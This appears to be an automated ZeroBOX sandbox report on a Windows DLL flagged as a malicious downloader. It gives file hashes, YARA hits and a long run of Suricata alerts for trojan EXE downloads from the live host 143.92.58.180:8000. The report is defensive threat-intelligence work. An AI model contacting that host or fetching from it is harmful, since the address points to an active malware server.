Summary | ZeroBOX

d-8

Malicious Library Downloader PE32 DLL PE File
Category FILE
Machine s1_win7_x6403_us
Started Oct. 18, 2023, 9:46 a.m.
Completed Oct. 18, 2023, 9:48 a.m.
Size 70.5KB
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 dc62653f9e2468f587b27fb7bb8857e2
SHA256 702ac05f0c523270a003e54c250535f52a6fcb5745089037a00b4d21926edca7
CRC32 3B2138BC
ssdeep 768:G407txg6CVX762AORxFGPRDEEOsx3n+79Namb3GluLrXCS32Ta1NzBoFsxHv5rMx:Gd7TGAgFqoQn+mmTCuL7NNzBl55rw3
Yara
  • Malicious_Library_Zero - Malicious_Library
  • Network_Downloader - File Downloader
  • PE_Header_Zero - PE File Signature
  • IsDLL - (no description)
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
143.92.58.180 Active Moloch

Suricata Alerts

TCP 192.168.56.103:49297 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49299 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49458 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49311 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49466 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49313 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49318 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49323 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49468 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49333 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49427 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49536 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49553 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49428 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49572 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49335 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49344 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49435 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49345 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49346 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49431 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49446 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49574 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49449 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49432 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49475 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49438 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49478 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49363 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49482 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49366 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49585 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49592 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49484 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49595 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49444 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49602 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49283 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49492 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49368 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49286 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49387 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49295 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49604 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49493 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49494 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49495 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49507 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49509 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49456 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49607 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49512 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49614 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49619 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49514 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49624 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49535 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49629 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49540 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49630 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49545 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49631 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49551 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49683 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49555 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49689 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49562 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49692 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49563 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49693 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49566 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49696 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49703 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49568 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49710 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49581 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49732 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49583 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49736 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49603 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49392 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49470 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49471 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49609 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49400 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49610 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49405 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49487 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49497 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49409 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49618 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49500 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49410 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49625 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49505 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49425 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49506 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49461 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49518 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49638 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49738 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49462 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49519 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49741 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49640 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49464 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49426 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49441 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49476 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49753 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49641 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49479 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49754 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49480 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49443 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49486 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49760 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49761 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49489 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49645 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49768 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49652 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49496 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49776 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49504 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49666 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49781 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49511 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49671 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49788 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49678 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49445 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49513 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49680 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49682 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49520 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49448 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49684 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49527 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49451 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49686 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49529 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49454 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49469 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49687 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49533 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49797 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49544 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49547 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49557 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49472 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49560 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49569 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49474 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49571 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49477 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49488 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49580 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49587 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49501 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49589 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49524 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49530 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49599 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49532 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49601 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49534 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49605 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49801 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49608 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49612 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49541 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49815 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49615 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49301 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49688 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49548 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49303 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49713 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49304 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49549 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49617 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49720 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49305 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49554 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49622 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49721 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49310 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49556 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49623 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49733 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49521 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49561 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49626 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 143.92.58.180:8000 -> 192.168.56.103:49735 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49522 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49628 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49564 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49745 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49528 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49633 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49565 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49326 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49749 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49531 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
